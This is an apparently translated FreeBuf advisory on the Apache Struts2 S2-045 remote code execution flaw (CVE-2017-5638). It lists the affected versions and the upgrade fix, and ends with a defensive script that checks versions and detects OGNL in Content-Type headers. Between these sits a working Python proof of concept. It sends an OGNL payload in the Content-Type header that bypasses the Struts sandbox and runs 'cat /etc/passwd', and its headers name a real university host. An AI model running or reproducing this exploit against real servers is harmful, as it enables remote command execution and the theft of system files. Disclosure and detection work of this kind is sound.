Apache Struts2 arbitrary code execution vulnerability disclosed (S2-045, CVE-2017-5638)


FreeBuf's previous coverage of a Struts 2 vulnerability was already more than six months ago. This one is an RCE (remote code execution) vulnerability: put simply, it abuses the Jakarta Multipart parser used for file uploads to execute code remotely. The vulnerability was reported by Nike Zheng.

Apache Struts is an open source MVC framework for building enterprise-class Java web applications, maintained by the Apache Software Foundation (a US organisation).

## Vulnerability number

CVE-2017-5638

## Vulnerability description

Struts does not handle file-upload requests processed by the Jakarta parser properly: a remote attacker who constructs a malicious Content-Type header can achieve remote command execution.

In the default.properties file, struts.multipart.parser has two documented values, jakarta and pell (the source actually also carries a third option, cos). The jakarta parser is a standard component of the Struts 2 framework and is enabled by default, which is why the severity of this vulnerability has to be taken seriously.

## Scope of impact

- Struts 2.3.5 – Struts 2.3.31
- Struts 2.5 – Struts 2.5.10

## Solution

If you are using the Jakarta-based file upload Multipart parser, upgrade to Apache Struts 2.3.32 or 2.5.10.1, or switch to a different implementation of the file upload Multipart parser.

## Vulnerability PoC

```python
#!/usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

# Request headers sent alongside the malicious Content-Type.
header = {
    "Host": "alumnus.shu.edu.cn",
    "Connection": "keep-alive",
    "Refer": "alumnus.shu.edu.cn",
    "Accept": "*/*",
    "X-Requested-With": "XMLHttpRequest",
    "Accept-Encoding": "deflate",
    "Accept-Language": "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
}


def poc():
    register_openers()
    # A multipart body so the request is routed through the Jakarta parser.
    datagen, headers = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    # The OGNL expression replaces the Content-Type value; Struts evaluates it
    # while handling the upload error, which is the S2-045 flaw.
    header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]), datagen, headers=header)
    response = urllib2.urlopen(request)
    print response.read()


poc()
```
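Two checks a defender would want for this advisory, added here as an example that is not part of the original post or of Struts itself: whether a Struts version string falls inside the affected ranges listed above (so that 2.3.32 and 2.5.10.1 read as fixed), and whether a request's Content-Type header carries an OGNL expression where a plain multipart media type belongs. The header values it scans are constructed samples.

```python
import re

# Affected ranges as listed in the advisory: 2.3.5 - 2.3.31 and 2.5 - 2.5.10.
AFFECTED_RANGES = [((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10))]

# OGNL expression delimiters; a legitimate Content-Type value never contains them.
OGNL_DELIM_RE = re.compile(r"[%$]\{")
# Tokens an S2-045 payload relies on (sandbox bypass, context access, process spawning).
OGNL_TOKENS = ("_memberAccess", "OgnlContext", "#context", "ProcessBuilder")
# A plain media type such as multipart/form-data, with nothing else in front of it.
MEDIA_TYPE_RE = re.compile(r"[\w.+-]+/[\w.+-]+")

def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); '2.5' -> (2, 5, 0), so it compares as 2.5.0."""
    parts = tuple(int(p) for p in text.strip().split("."))
    return parts + (0,) * max(0, 3 - len(parts))

def is_affected(version):
    """True when the Struts version lies in an affected range; 2.3.32 and 2.5.10.1 are fixed."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)

def inspect_content_type(value):
    """Return the reasons a Content-Type value looks like an S2-045 probe ([] when clean)."""
    reasons = []
    if OGNL_DELIM_RE.search(value):
        reasons.append("ognl-delimiter")
    reasons.extend(token for token in OGNL_TOKENS if token in value)
    media_type = value.split(";", 1)[0].strip()
    if not MEDIA_TYPE_RE.fullmatch(media_type):
        reasons.append("malformed-media-type")
    return reasons

def scan_requests(requests):
    """Return (index, reasons) for every header set whose Content-Type is suspicious."""
    hits = []
    for index, headers in enumerate(requests):
        reasons = inspect_content_type(headers.get("Content-Type", ""))
        if reasons:
            hits.append((index, reasons))
    return hits

# Constructed sample header sets: two ordinary requests and one probe-shaped value
# that carries the OGNL markers (the expression itself is deliberately inert).
SAMPLE_REQUESTS = [
    {"Content-Type": "multipart/form-data; boundary=----ConstructedBoundary42"},
    {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},
    {"Content-Type": "%{(#_memberAccess=#dm).(#context['constructed'])}"},
]
```

`scan_requests(SAMPLE_REQUESTS)` flags only the third header set, naming the delimiter, the two OGNL tokens it contains and the missing media type; the same check can run over a WAF or access log that records Content-Type.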